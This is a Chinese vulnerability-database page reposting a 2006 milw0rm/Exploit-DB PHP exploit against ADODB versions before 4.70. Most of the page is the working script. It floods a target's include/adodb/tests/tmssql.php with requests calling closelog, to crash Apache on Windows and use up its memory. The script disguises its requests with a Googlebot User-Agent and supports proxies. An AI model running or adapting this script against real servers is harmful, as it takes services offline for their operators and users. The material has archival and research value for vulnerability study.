ADODB < 4.70 - 'tmssql.php' Denial of Service

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1055648 漏洞类型
发布时间 2006-04-09 更新时间 2006-04-09
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/1651
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "ADODB tmssql.php Denial of service\r\n";
echo "by rgod rgod@autistici.org\r\n";
echo "site: http://retrogod.altervista.org\r\n\r\n";

if ($argc<4) {
echo "Usage: php ".$argv[0]." host path redo OPTIONS\r\n";
echo "host:      target server (ip/hostname)\r\n";
echo "path:      path to ADODB\r\n";
echo "redo:      how many times?\r\n";
echo "Options:\r\n";
echo "   -p[port]:    specify a port other than 80\r\n";
echo "   -P[ip:port]: specify a proxy\r\n";
echo "Examples:\r\n";
echo "php ".$argv[0]." localhost /some_app/ 9999999\r\n";
echo "php ".$argv[0]." localhost /some_app/ 9999999 -p81\r\n";
echo "php ".$argv[0]." localhost /some_app/ 9999999 -P1.1.1.1:80\r\n";
die;
}
/*
  tested against Apache/1.3.27 (Win32) PHP/4.3.3
  
  closelog() func close the connection to the system logger, but if its handle
  is never initialized, Windows exception is raised by the php4ts.dll
  module at address 0x00000000100bf014.
  By sending multiple requests to the tmssql.php script, which allow
  execution of an arbitrary function without arguments, this will cause
  the Apache process to crash and to consume a large amount of memory
*/

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port."\r\n";
    }
  }
  else {
	$c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';
	}
  }
  fputs($ock,$packet);
  fclose($ock);
}

$host=$argv[1];$path=$argv[2];$redo=$argv[3];
$port=80;$proxy="";
for ($i=4; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
}

if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

for ($i=1; $i<=$redo; $i++)
{
$packet ="GET ".$p."include/adodb/tests/tmssql.php?do=closelog HTTP/1.0\r\n";
$packet.="User-Agent: Googlebot/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
echo $packet;
}
?>

# milw0rm.com [2006-04-09]